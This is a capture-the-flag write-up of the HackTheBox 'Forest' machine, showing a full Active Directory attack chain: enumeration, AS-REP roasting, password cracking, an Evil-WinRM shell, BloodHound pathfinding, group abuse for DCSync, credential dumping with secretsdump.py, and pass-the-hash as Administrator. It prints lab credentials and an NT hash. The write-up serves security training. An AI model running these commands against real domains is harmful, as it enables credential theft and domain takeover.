HackTheBox Forest writeup

HackTheBox Forest writeup

Forest is an awesome Windows-based machine, difficulty was set as “Easy”, user score is 4.6.

This machine is all about Active Directory exploitation.


Start with nmap scan:

nmap -sS -sV -p-      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Continue with enum4linux:

enum4linux -a forest.htb

Output is massive, but contain some useful information:

  • FOREST.htb.local is the domain controller

  • EXCH01.htb.local is an Exchange server

  • Users sebastian, santi, andy, lucinda, mark and svc-alfresco


AS-REP Roasting is an attack against Kerberos for user accounts that do not require preauthentication. During preauthentication, a user will enter their password which will be used to encrypt a timestamp and then the domain controller will attempt to decrypt it and validate that the right password was used and that it is not replaying a previous request. If a user is configured to not require Kerberos pre-authentication, anyone can send a request (AS_REQ) to the KDC and receive a response (AS_REP). The response contains an encrypted chunk of data related to that user that can be cracked offline to retrieve the user's password. This can be automatized with tools like Impacket GetNPUsers.py:

GetNPUsers.py htb.local/ -usersfile users.txt -format john

We get a hash for a service account svc-alfresco, now it’s time to crack it with john:

john --wordlist=./rockyou.txt hash.txt

The password is s3rvice.

As we got in nmap results, the 5985 port is open which is used for Windows remote management, we can use Evil-WinRM to pop up a shell:

evil-winrm -u svc-alfresco -p s3rvice -I -s ‘BloodHound/Ingestors/’

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

The -s flag here stands for importing scripts, you can also use -e to import .exe files (to run the mimikatz, for example). That flag will help in the Privilege Escalation phase.

Privilege Escalation

User svc-alfresco does not have any write permissions, but as we used -s flag for Evil-WinRM it’s not needed:

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-SharpHound

Evil-WinRM also has a great feature that allows you to download a .zip file from a SharpHound:

download remote_filename` or `download remote_filename destination_filename

Run a BloodHound and drag-and-drop the .zip from a SharpHound. Now we have a valid path for privileged escalation to Domain Admin. As a service account svc-alfresco is a member of Account Operators can create new accounts with the right in Exchange Windows Permissions group.

Creating a new user. As Evil-WinRM is running the PowerShell by default, we can use both CMD’s and PS’s ways to do so:

net user z3v5 p@ssw0rd /domain /add
net group ‘Exchange Windows Permissions’ z3v5 /domain  /add


$pass = ConvertTo-SecureString "p@ssw0rd" -AsPlainText -Force
New-ADUser z3v5 -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members z3v5

New user z3v5 is a part of the Exchange Windows Permissions group now and that’s mean we can perform DCSync attack now. DCSync right allows an attacker to simulate the behavior of a Domain Controller, and it has two stages:

  • Discover the Domain Controller in the provided domain

  • Request the Domain Controller to replicate the user credentials

To automate that we can use secretsdump.py from Impacket:

secretsdump.py z3v5:p@ssw0rd@
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Plenty of different options for what to do with the hash of the Administrator account, but I followed one the Evil-WinRM:

evil-winrm -i -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami